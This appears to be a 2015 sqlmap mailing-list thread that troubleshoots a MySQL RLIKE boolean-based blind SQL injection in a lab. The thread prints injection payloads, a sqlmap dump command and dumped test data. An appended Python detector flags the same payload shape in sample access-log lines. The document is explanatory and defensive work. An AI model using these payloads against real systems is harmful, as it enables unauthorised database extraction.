Hi again.
I believe that we have a problem here. I am trying to reproduce your
"problem" and can't do it:
mysql> select * from users;
+----+--------+----------------------------------+
| id | name   | surname                          |
+----+--------+----------------------------------+
|  1 | admin  | blissett                         |
|  2 | fluffy | bunny                            |
|  3 | wu     | ming                             |
|  4 | NULL   | nameisnull                       |
|  5 | md5    | 098f6bcd4621d373cade4e832627b4f6 |
+----+--------+----------------------------------+
5 rows in set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
mysql>
I believe that you have a problem with the order of returned results. You can't
expect query results to be returned in a deterministic way. That's just how
the DBMS works.
Also, that's why we use ORDER BY wherever we can, to skip this kind of
problem. If you take a look into -v 3 of your run in sqlmap you'll see
that it uses "ORDER BY", while you don't use it in your case:
[14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT
IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT
0,1),6,1))>2) THEN 1 ELSE 0x28 END))
Kind regards,
Miroslav Stampar
On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> "I only bring it up because sqlmap has no problem grabbing the database
> with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
> Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name   | surname                                 |
> +----+--------+-----------------------------------------+
> |  1 | luther | blissett                                |
> |  2 | fluffy | bunny                                   |
> |  3 | wu     | ming                                    |
> |  4 | NULL   | nameisnull                              |
> |  5 | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>
>> Right, in the sql statement where I select 'a', the ord of this is not
>> greater than 112, and it fails as expected with parens not balanced.
>>
>> The query below this that selects the first name from users should be
>> functionally equivalent to select 'a' as mid is used to select the first
>> character of the first username which is 'admin' as shown, but this
>> statement does not fail as expected.
>>
>> I am at a loss as to why the latter does not fail when the inner select
>> is functionally equivalent to select 'a', and the former fails as expected.
>>
>> I only bring it up because sqlmap has no problem grabbing the database
>> with rlike but can't enumerate the values from the user table, and I logged
>> into the server as root to try to figure out what the issue might be and
>> this seems to be the root cause.
>>
>> Sent from a phone
>>
>> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>
>> Hi.
>>
>> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function
>> here (in your case) is to PROVOKE errors on False, and that's exactly
>> what's going on here.
>>
>> In case of True, RLIKE is called with the perfectly valid 0x7474747474, while
>> in case of False it's called with the erroneous regexp 0x28 ('parentheses not
>> balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>>
>>> Have an injection that I can use RLIKE to induce a 500 error, but it
>>> only works in some circumstances. Enumerating the DATABASE() value works,
>>> as well as the current user, but enumerating values from the database
>>> tables fails. Even as root on the box, the RLIKE query fails to throw an
>>> exception when attempting to use RLIKE in some instances.
>>>
>>> As you can see in the output below, the user can select the first name
>>> value from the users table (which is ‘admin’). When using RLIKE to test the
>>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>>> not balanced exception as expected. You also get this exception when simply
>>> selecting ‘a’.
>>>
>>> But when you select the first row from the users table and grab the
>>> first character (an ‘a’), no exception is thrown and an empty result set is
>>> returned.
>>>
>>> Any thoughts?
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>>> 0x7474747474 ELSE 0x28 END));
>>> Empty set (0.01 sec)
>>>
>>> mysql> SELECT `name` from users LIMIT 0,1;
>>> +-------+
>>> | name  |
>>> +-------+
>>> | admin |
>>> +-------+
>>> 1 row in set (0.00 sec)
>>>
>>> mysql>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
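The following is an added example, not part of this thread and not sqlmap's own code: a small Python detector that scans constructed Apache-style access-log lines for the RLIKE/CASE payload shape quoted above, decodes the 0x... literals in the THEN and ELSE branches, and reports which branch carries a regexp that cannot compile, i.e. the one that makes RLIKE raise the 'parentheses not balanced' error instead of returning a match. The log format, the sample lines and the client addresses are assumptions; Python's re module stands in for MySQL's regex engine, which agrees with it on a lone '(' (0x28).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines ("combined"-style format, assumed).
# The request path mirrors the sqlmap test target quoted in the thread; the
# client addresses come from the documentation range and are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2015:14:14:52 +0000] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 512
192.0.2.10 - - [21/Feb/2015:14:14:53 +0000] "GET /sqlmap/mysql/get_int.php?id=1+RLIKE+(SELECT+(CASE+WHEN+(7668%3D7668)+THEN+1+ELSE+0x28+END)) HTTP/1.1" 200 512
192.0.2.10 - - [21/Feb/2015:14:14:54 +0000] "GET /sqlmap/mysql/get_int.php?id=1+RLIKE+(SELECT+(CASE+WHEN+(ORD(MID((SELECT+DATABASE()),1,1))>112)+THEN+0x7474747474+ELSE+0x28+END)) HTTP/1.1" 500 0
192.0.2.11 - - [21/Feb/2015:14:15:00 +0000] "GET /sqlmap/mysql/get_int.php?id=2 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Shape of the "MySQL RLIKE boolean-based blind" payload shown in the thread:
#   <value> RLIKE (SELECT (CASE WHEN (<condition>) THEN <regexp> ELSE <regexp> END))
RLIKE_CASE_RE = re.compile(
    r'\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b.*?\bTHEN\b(?P<then>.*?)\bELSE\b(?P<else>.*?)\bEND\b',
    re.IGNORECASE | re.DOTALL,
)
HEX_LITERAL_RE = re.compile(r'\b0x([0-9a-fA-F]+)\b')


def decode_hex_literal(hexdigits):
    """A MySQL 0x... literal used where a string is expected is the raw bytes it encodes."""
    if len(hexdigits) % 2:          # MySQL pads an odd-length literal with a leading 0
        hexdigits = "0" + hexdigits
    return bytes.fromhex(hexdigits).decode("latin-1")


def is_broken_regexp(pattern):
    """True when the pattern does not compile.  Python's re stands in for MySQL's
    regex engine here (an assumption); both reject a lone '(' (0x28), which is
    exactly what the 'parentheses not balanced' error in the thread reports."""
    try:
        re.compile(pattern)
    except re.error:
        return True
    return False


def analyse_request(line):
    """Return a finding dict for a request carrying the RLIKE/CASE shape, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        pm = RLIKE_CASE_RE.search(value)
        if not pm:
            continue
        literals = {h: decode_hex_literal(h) for h in HEX_LITERAL_RE.findall(value)}
        return {
            "ip": m.group("ip"),
            "param": name,
            "status": int(m.group("status")),
            "then_branch": pm.group("then").strip(),
            "else_branch": pm.group("else").strip(),
            # literals that make RLIKE raise instead of match: the error oracle
            "broken_literals": sorted(h for h, s in literals.items() if is_broken_regexp(s)),
        }
    return None


def scan_log(text):
    """Run analyse_request over every line and keep the hits."""
    return [f for f in (analyse_request(l) for l in text.splitlines()) if f is not None]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "server error (oracle fired)" if f["status"] >= 500 else "no error"
        print(f'{f["ip"]} param={f["param"]} status={f["status"]} {verdict} '
              f'then={f["then_branch"]!r} else={f["else_branch"]!r} broken={f["broken_literals"]}')
```

Run against the constructed lines, the two payload requests are flagged on the `id` parameter with `0x28` as the broken literal in the ELSE branch, and the 500 response on the third line is the visible side effect of that branch being chosen. Correlating the flagged request with the response status is the useful part for a detection rule: as the thread explains, the oracle is the error the regexp provokes, not whether RLIKE matches, so a burst of the same parameter alternating between 200 and 500 on CASE/RLIKE-shaped values is the pattern to alert on.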